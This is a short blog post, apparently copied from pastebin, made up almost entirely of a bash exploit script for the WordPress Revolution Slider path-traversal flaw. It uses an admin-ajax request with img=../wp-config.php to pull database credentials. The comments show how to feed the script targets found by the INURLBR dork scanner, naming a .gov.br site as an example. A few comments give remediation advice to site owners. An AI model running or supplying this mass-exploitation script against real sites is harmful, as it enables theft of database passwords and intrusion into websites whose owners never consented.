
Tuesday, 26 May 2015

Wordpress Revolution Slider

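    #!/bin/bash
    # Add-on check for the INURLBR scanner:
    # ./inurlbr.php --dork 'admin-ajax.php?action=revolution'  -s revolution.txt -q 1,6 [...]
    #  --comand-all 'bash script.sh "http://_TARGET_" "/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php"'
    #
    # Example: bash script.sh http://target.br you_exploit
    # Exec:    bash script.sh http://target.gov.br '/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php'
    #
    # Arguments: $1 - base URL of the site, $2 - request path appended to it.
    # Outputs:   "[+] <url>" on stdout (also appended to the results file) when
    #            the response body contains "DB_", otherwise "not vuln".
    #
    # Reading the result: the request asks the slider's image handler for
    # ../wp-config.php, and "DB_" is the prefix of the database constants
    # WordPress keeps in that file (DB_NAME, DB_USER, DB_PASSWORD, DB_HOST).
    # The match is a heuristic: any response that happens to contain "DB_"
    # is reported, so a hit still needs manual confirmation.
    #
    # For a site owner a confirmed hit means the configuration file was
    # readable without authentication: update the slider plugin, rotate the
    # database password and the auth keys/salts, and search the web server
    # access log for admin-ajax.php requests whose img parameter contains "../".

    if [ "$#" -lt 2 ]; then
      printf 'Usage: %s BASE_URL REQUEST_PATH\n' "${0##*/}" >&2
      exit 2
    fi

    url="$1$2"
    out_file=/output/wp-out-curl.txt

    # An explicit if/else replaces the original `a && b || c` chain: with the
    # chain, a failing tee (for example when /output does not exist) fell
    # through to the last branch and printed "not vuln" right after the hit.
    if curl -s "$url" | grep -q 'DB_'; then
      printf '[+] %s\n' "$url" | tee -a "$out_file" ||
        printf 'warning: could not append to %s\n' "$out_file" >&2
    else
      echo not vuln
    fi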
     
    Source: pastebin
